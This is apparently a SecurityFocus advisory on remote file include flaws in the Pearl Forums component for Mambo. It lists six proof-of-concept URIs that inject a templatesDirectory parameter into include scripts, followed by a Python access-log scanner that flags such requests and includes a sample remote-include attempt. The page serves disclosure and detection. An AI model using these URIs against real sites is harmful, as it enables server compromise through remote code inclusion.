
Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/includes/admin.php?templatesDirectory-evill code
http://www.example.com//[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code
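
The following detection sketch is an added example, not part of the original advisory: it scans web server access-log lines for requests to the include scripts listed above that carry a templatesDirectory parameter in the query string. The log format (common/combined), the sample lines, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter names come from the proof-of-concept URIs on this page.
SCRIPTS = {"admin.php", "password.php", "profile.php",
           "merge.php", "adminpolls.php", "poll.php"}
PARAM = "templatesdirectory"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return 'remote-url', 'parameter-set', or None for one request target."""
    # Collapse leading slashes so '//path' is not parsed as a network location.
    parts = urlsplit("/" + target.lstrip("/"))
    segments = [s.lower() for s in unquote(parts.path).split("/") if s]
    if len(segments) < 2 or segments[-2] != "includes" or segments[-1] not in SCRIPTS:
        return None
    # parse_qsl percent-decodes names, so %5B...%5D and literal [...] both match;
    # keep_blank_values keeps parameters that arrive without '='.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if PARAM in name.lower():
            # Assumption: a scheme or '//' prefix in the value suggests a remote include attempt.
            remote = "://" in value or value.startswith("//")
            return "remote-url" if remote else "parameter-set"
    return None

def scan(lines):
    """Return (line_number, classification) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        verdict = classify_request(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict))
    return hits

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /forum/includes/poll.php?id=3 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2009:10:00:05 +0000] "GET /forum/includes/password.php'
    '?GlobalSettings%5BtemplatesDirectory%5D=http://host.invalid/x HTTP/1.1" 200 0',
    '203.0.113.5 - - [01/Jan/2009:10:00:09 +0000] "GET //forum/includes/merge.php'
    '?GlobalSettings[templatesDirectory]=../tmp HTTP/1.0" 200 0',
    '192.0.2.10 - - [01/Jan/2009:10:01:00 +0000] "GET /forum/index.php?templatesDirectory=x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

Access logs normally record only the query string, so the same parameter sent in a POST body would need request-body logging or a WAF rule to be seen.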







 

Copyright 2009, SecurityFocus